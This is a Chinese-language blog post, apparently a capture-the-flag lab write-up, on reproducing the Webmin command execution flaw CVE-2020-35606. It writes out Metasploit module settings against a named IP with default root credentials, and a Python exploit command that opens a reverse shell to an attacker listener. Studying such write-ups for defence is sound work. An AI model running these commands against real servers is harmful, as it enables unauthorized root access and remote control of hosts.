Webmin 命令执行漏洞 (CVE-2020-35606)

Webmin 命令执行漏洞 (CVE-2020-35606),第1张

Webmin 命令执行漏洞 (CVE-2020-35606)

Webmin 命令执行漏洞 (CVE-2020-35606)
  • Webmin 命令执行漏洞 (CVE-2020-35606)
    • 0x01 漏洞描述
    • 0x02 影响范围
    • 0x03 漏洞复现
      • 使用msf复现
      • 利用脚本 成功
    • 0x04 漏洞修复

Webmin 命令执行漏洞 (CVE-2020-35606) 0x01 漏洞描述

Webmin是Webmin社区的一套基于Web的用于类Unix *** 作系统中的系统管理工具。 Webmin 1.962版本及之前版本存在安全漏洞,该漏洞允许执行任意命令。任何被授权使用Package Updates模块的用户都可以使用根权限通过包含和的向量执行任意命令。 账户密码:root:password

CVE-2020-35606使用的还是CVE-2019-12840的执行脚本,换了新的载体,利用方式还是一样的

https://ip:port/session_login.cgi

0x02 影响范围

Webmin 1.962版本及之前版本

0x03 漏洞复现 使用msf复现

脚本地址

https://github.com/puckiestyle/CVE-2020-35606


下载下导入msf后 relod_all 失败 后来将文件名改为

webmin_pu_escape_bypass_rce.rb

重启msfconsole 导入成功 不知道是不是文件名原因
导入msf方法

使用脚本

search webmin
use 6
info   查看脚本信息
set rhosts 118.193.36.37
set rport 9720(一般是10000)
set ssl true  (开启ssl就设为true)
set username root      # 运行时提示 要账号密码 就又加上
set password password  
check  #检查是否存在漏洞


漏洞存在

反dshell 的话

在之前基础上 
set lhost vps的ip
run

不知道为什么创建会话失败

利用脚本 成功

webmin_cve-2019-12840_poc
脚本地址

https://github.com/KrE80r/webmin_cve-2019-12840_poc

python3运行

使用前注意修改 py文件中的 121行的端口号

反dshell

python CVE-2019-12840.py -u https://vulfocus.fofa.so -U root -P password -lhost x.x.x.x -lport 9897


脚本反dshell成功
flag获取

0x04 漏洞修复

升级到最新版本

欢迎分享,转载请注明来源:内存溢出

原文地址: https://outofmemory.cn/zaji/5479789.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2022-12-12
下一篇 2022-12-12

发表评论

登录后才能评论

评论列表(0条)

保存